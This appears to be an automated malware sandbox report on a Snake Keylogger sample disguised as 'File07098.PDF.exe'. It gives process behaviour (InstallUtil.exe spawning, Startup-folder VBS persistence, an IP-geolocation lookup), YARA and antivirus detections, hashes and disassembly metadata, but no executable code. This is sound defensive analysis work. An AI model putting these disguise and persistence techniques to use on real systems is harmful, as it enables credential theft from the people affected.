                                                      2024-10-30 06:58:07 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                      Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:02:57:29
                                                      Start date:30/10/2024
                                                      Path:C:\Users\user\Desktop\File07098.PDF.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\File07098.PDF.exe"
                                                      Imagebase:0xa0000
                                                      File size:130'048 bytes
                                                      MD5 hash:71360D65665D164B175A5A73964E96EC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2097674143.0000000005FC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2078600685.0000000002476000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:02:57:35
                                                      Start date:30/10/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                      Imagebase:0x8d0000
                                                      File size:42'064 bytes
                                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4484950182.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4484950182.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:moderate
                                                      Has exited:false

                                                      General

                                                      Target ID:4
                                                      Start time:02:57:47
                                                      Start date:30/10/2024
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs"
                                                      Imagebase:0x7ff6241f0000
                                                      File size:170'496 bytes
                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:02:57:48
                                                      Start date:30/10/2024
                                                      Path:C:\Users\user\AppData\Roaming\Current.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\Current.exe"
                                                      Imagebase:0x7d0000
                                                      File size:130'048 bytes
                                                      MD5 hash:71360D65665D164B175A5A73964E96EC
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2265233058.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 63%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:02:57:53
                                                      Start date:30/10/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                      Imagebase:0xc0000
                                                      File size:42'064 bytes
                                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4483465030.0000000002639000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4483465030.0000000002471000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Disassembly

                                                      Reset < >

                                                        Executed Functions

                                                        Function 04D2E9B0 Relevance: 16.1, Strings: 12, Instructions: 1102COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ,wq$4$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq
                                                        • API String ID: 0-142878317
                                                        • Opcode ID: 7bfb9c2b8b0548490ccf24c4424cf0bf823de45f4150467e4738637f0aa6ca99
                                                        • Instruction ID: 209d9325d8edb107916b4c935db5cdbb49169d4bb95ab7ec5d879b4ae5c36cb6
                                                        • Opcode Fuzzy Hash: 7bfb9c2b8b0548490ccf24c4424cf0bf823de45f4150467e4738637f0aa6ca99
                                                        • Instruction Fuzzy Hash: 18B2F434A00228DFDB14DFA9C994BADB7B6BF88304F148599E505EB3A5DB70AC81DF50
                                                        Function 04D2ECD7 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ,wq$4$$sq$$sq$$sq$$sq
                                                        • API String ID: 0-3730739033
                                                        • Opcode ID: a54931e6122adac3ceca64964542ad1f03056a348c86934e0ffa8807f1998d8a
                                                        • Instruction ID: e80b7f4b4ddc074b5b30c95abb83c47285a6737a9e79c678ace27c73355810f8
                                                        • Opcode Fuzzy Hash: a54931e6122adac3ceca64964542ad1f03056a348c86934e0ffa8807f1998d8a
                                                        • Instruction Fuzzy Hash: 05221934A00229CFDB14DF65CA94BADB7B2FF58304F148599E509EB2A5DB30AD81DF50
                                                        Function 04D2A500 Relevance: 3.0, Strings: 2, Instructions: 453COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Tesq$*Xx
                                                        • API String ID: 0-2247355998
                                                        • Opcode ID: bfefcadc48e2280fb2bb8ed485fd3c5a605269c0232f717040d3724290047efd
                                                        • Instruction ID: f7e47f59da499ae13c5b59558590f2af0fe170c947ad7bf6a51a1578a6adec7d
                                                        • Opcode Fuzzy Hash: bfefcadc48e2280fb2bb8ed485fd3c5a605269c0232f717040d3724290047efd
                                                        • Instruction Fuzzy Hash: 79124570A05228CFDB24DF69D984BADB7F6FB89304F5081A9E449A7345DB30AE85CF41
                                                        Function 04D2A4F0 Relevance: 2.9, Strings: 2, Instructions: 444COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Tesq$*Xx
                                                        • API String ID: 0-2247355998
                                                        • Opcode ID: 876d1bd5e34b65712bb92e681c8e007980280972a2536c97aea7f188dd9111ab
                                                        • Instruction ID: 450996146c4c4a1e29f2f53732e090ce48dbcfab8259f64dc086a2ee15055b9a
                                                        • Opcode Fuzzy Hash: 876d1bd5e34b65712bb92e681c8e007980280972a2536c97aea7f188dd9111ab
                                                        • Instruction Fuzzy Hash: FB122670A01228CFDB24DF69D984BADB7F2FB49304F5081A9E449A7355DB30AE85CF51
                                                        Function 069AECD8 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2098461453.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6990000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Dzq
                                                        • API String ID: 0-4123679374
                                                        • Opcode ID: b052b67467c169758f2184755eb8e72d4ebd80aa2a64420a0dbc991c70c8e163
                                                        • Instruction ID: 315d89959967a71853f66726f7bad1bef756cb04d0c988f8a5da445d8258df0f
                                                        • Opcode Fuzzy Hash: b052b67467c169758f2184755eb8e72d4ebd80aa2a64420a0dbc991c70c8e163
                                                        • Instruction Fuzzy Hash: 60D1D374E01218CFDB54DFA9D894A9DBBB2FF88300F6081A9D419AB365DB31AD81CF50
                                                        Function 04D21C60 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Tesq
                                                        • API String ID: 0-136783293
                                                        • Opcode ID: bb26ebb0a6b4a0e9a7afaaff8f15395b35ed01d451db4d503061ec45d724e3aa
                                                        • Instruction ID: a022fe803cba4af3f85a4921a7df3ee64cf2ead8d4ede784eac69d3ee9edf3d1
                                                        • Opcode Fuzzy Hash: bb26ebb0a6b4a0e9a7afaaff8f15395b35ed01d451db4d503061ec45d724e3aa
                                                        • Instruction Fuzzy Hash: 76B13A74E05228CFDB54CFA9DA84B9DBBF2BF59304F1080A9D419A7351DB71A985CF00
                                                        Function 04D21C70 Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Tesq
                                                        • API String ID: 0-136783293
                                                        • Opcode ID: 15bda1b6f8645db5b1ce6f3f0f02dc193441f748c3d1bef50cca7b0b33c7280e
                                                        • Instruction ID: 4b723fe99a166b0a030a05024bea8e1e79165b63b098fc49afeaaf081e483da8
                                                        • Opcode Fuzzy Hash: 15bda1b6f8645db5b1ce6f3f0f02dc193441f748c3d1bef50cca7b0b33c7280e
                                                        • Instruction Fuzzy Hash: 79B12D74E05228CFDB54CFA9DA84BADBBF1BF59308F1090A9D419A7351EB71A985CF00
                                                        Function 00A853D0 Relevance: .2, Instructions: 213COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2078378369.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a80000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a0b3ea823380dcf50fd6fb45f19648a7050da0be5fc494e2ccb7353b35e63c49
                                                        • Instruction ID: f5b107be6d5b2fd26afd2e37f5cc389d40e1d298fdba0c7852bf9743df932534
                                                        • Opcode Fuzzy Hash: a0b3ea823380dcf50fd6fb45f19648a7050da0be5fc494e2ccb7353b35e63c49
                                                        • Instruction Fuzzy Hash: C2817A74E04904CFDB04EBA8C494BAAB7B3FB84310F65C565D805AF644C3B4ED86CB51
                                                        Function 00A853C1 Relevance: .2, Instructions: 205COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2078378369.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a80000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 602992a5d2834767f3e36df6a6adbb0bc3b7282efea11a6d32aa1783f5b66085
                                                        • Instruction ID: 1efcecebaede9b32646d8e71580b7cf4d2790bee62ea37e5d89bbfe85afe832d
                                                        • Opcode Fuzzy Hash: 602992a5d2834767f3e36df6a6adbb0bc3b7282efea11a6d32aa1783f5b66085
                                                        • Instruction Fuzzy Hash: 48816B78E04904CFDB04EBA8C494BAAB7F2EB84310F69C5A5D805AF655C3B4AD85CF51
                                                        Function 00A86B57 Relevance: .2, Instructions: 201COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2078378369.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a80000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 10d8204d73aad2e84efdf42af39f7dced092ab3198154824a5c1d911010ad0cf
                                                        • Instruction ID: 534e3da31755027f6dc145693af002abbde6975762f365ab6863fbbfe0071c79
                                                        • Opcode Fuzzy Hash: 10d8204d73aad2e84efdf42af39f7dced092ab3198154824a5c1d911010ad0cf
                                                        • Instruction Fuzzy Hash: BC917674A14204DFE714EF18D488BA9B7F2FB84318F648AA4E405AF6A5E334EC85DF51
                                                        Function 00A86B68 Relevance: .2, Instructions: 194COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2078378369.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a80000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 78d945b4da466781b680b0887e892d7cebc64744df32dac0e011eb6708635721
                                                        • Instruction ID: c1a2fa126808200c56c2a27e9014e658cbac759ab048d3fde90b353c259b310f
                                                        • Opcode Fuzzy Hash: 78d945b4da466781b680b0887e892d7cebc64744df32dac0e011eb6708635721
                                                        • Instruction Fuzzy Hash: E5815774A14204DFE714EF58D488BA9B3F2FB88318F648A64E405AF695E334EC81DF51
                                                        Function 04D20FF9 Relevance: .2, Instructions: 164COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6e7284ec62b44eaf037fbe03a6b9d58938e5b3ee8b860acd77417bfc9ec58900
                                                        • Instruction ID: 3f9027df8643391030d8e23880f6c9641046065255376d17775fe074e3ab3fc0
                                                        • Opcode Fuzzy Hash: 6e7284ec62b44eaf037fbe03a6b9d58938e5b3ee8b860acd77417bfc9ec58900
                                                        • Instruction Fuzzy Hash: EC712770E05228CFDB10CFA9CA85BADBBF2FB59308F5085A9D049A7654E775A984CF00
                                                        Function 04D2CE18 Relevance: 2.6, Strings: 2, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (wq$Hwq
                                                        • API String ID: 0-584953801
                                                        • Opcode ID: 2bcca4cf563ec7525f116bde3df01ee88aacdd53c35638f545ba882bd26a4d67
                                                        • Instruction ID: e05308705a611e37cb8752c6d3b10b69211d4b5e56f893f347235f8fd845cb16
                                                        • Opcode Fuzzy Hash: 2bcca4cf563ec7525f116bde3df01ee88aacdd53c35638f545ba882bd26a4d67
                                                        • Instruction Fuzzy Hash: 624121312047508FD365DF3AC48034ABBF2AF90714F108A2EE09A8B2E1DB38EC45CB90
                                                        Function 04D2C400 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: pwq
                                                        • API String ID: 0-3750715768
                                                        • Opcode ID: 7c1bec1c65e3ad4e10839efd74f966e56c86fe45016f35df67eece05cd5b8db5
                                                        • Instruction ID: 9bf234c6845f50f00d61018037f3eb7427faa4fb1d3304f9450358907ba4ee5c
                                                        • Opcode Fuzzy Hash: 7c1bec1c65e3ad4e10839efd74f966e56c86fe45016f35df67eece05cd5b8db5
                                                        • Instruction Fuzzy Hash: 7E512E76610104AFCB459FA8D945D69BBF7FF8C31471580A8E2099B372DA32DC22EB51
                                                        Function 04D2D3C8 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (wq
                                                        • API String ID: 0-1062398946
                                                        • Opcode ID: 3058329ffa856b8c380cb9d8316cbdba3a91391bc22b0a7e6fc789bb96f53fa4
                                                        • Instruction ID: 40073e728bd437339a5158668ba721a8b86cc41470abd8d7e398bdd7afca96c2
                                                        • Opcode Fuzzy Hash: 3058329ffa856b8c380cb9d8316cbdba3a91391bc22b0a7e6fc789bb96f53fa4
                                                        • Instruction Fuzzy Hash: 6751F331B046268FCB01DF68D48496AFBB6FF86324B1586AAE5559B342D730FC52CBD0
                                                        Function 00A857E0 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2078378369.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a80000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \ssq
                                                        • API String ID: 0-3577270928
                                                        • Opcode ID: 30965c4c48fb882dd83d6d77273c9f2a292cb42d760af96a30c667c764e5d785
                                                        • Instruction ID: 67f69abaf819f13d2c46342dde455bb85e62397312c890d9c7dfeb3fbcac5c68
                                                        • Opcode Fuzzy Hash: 30965c4c48fb882dd83d6d77273c9f2a292cb42d760af96a30c667c764e5d785
                                                        • Instruction Fuzzy Hash: C3417D75B00900CFE710EBB9D884BAAB7F6EB84320F61C57AD919D7660D7349D418B51
                                                        Function 04D2E2A0 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ,wq
                                                        • API String ID: 0-2764286452
                                                        • Opcode ID: 5cdec2b3a4a5473cecd7a6aeae9f83644990ec9c289134353f9c8c85bb92451b
                                                        • Instruction ID: 4922cafbb38404d087c36683313051a1ea75fc5cb66474fed0611120b36dcebd
                                                        • Opcode Fuzzy Hash: 5cdec2b3a4a5473cecd7a6aeae9f83644990ec9c289134353f9c8c85bb92451b
                                                        • Instruction Fuzzy Hash: 5541AB757002148FCB04EF68C9908AEBBF2FF85311B51856AE905DB361DB30EC02CB91
                                                        Function 00A857D0 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2078378369.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a80000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \ssq
                                                        • API String ID: 0-3577270928
                                                        • Opcode ID: afcf8c60bc652af78defd4a47cc710587635bb8908b48cefc557a636ecd9ec0e
                                                        • Instruction ID: 77b542ec81b56844258cc8ba278bd4116279f66d34c6270d24e1e1a12738166a
                                                        • Opcode Fuzzy Hash: afcf8c60bc652af78defd4a47cc710587635bb8908b48cefc557a636ecd9ec0e
                                                        • Instruction Fuzzy Hash: 87310275B04900CFE710EBB9D884AAAB7F6FBC4320F20C5BAD4199B661C7308D45CB51
                                                        Function 04D2CCB0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (wq
                                                        • API String ID: 0-1062398946
                                                        • Opcode ID: 20e72ed050be031d8e5a926b43cdd3549b45d63d38ca26cf5e9c6e16848ce7a9
                                                        • Instruction ID: 9a126e48eeef8fa26d7dc929f62f9b9faf4dd94e8d3c0e23cd5fa4a4bc9af891
                                                        • Opcode Fuzzy Hash: 20e72ed050be031d8e5a926b43cdd3549b45d63d38ca26cf5e9c6e16848ce7a9
                                                        • Instruction Fuzzy Hash: F521F835304251AFDB15AF69E8449AE7FA7EFC9320B54417AF908CB391DE729C11C790
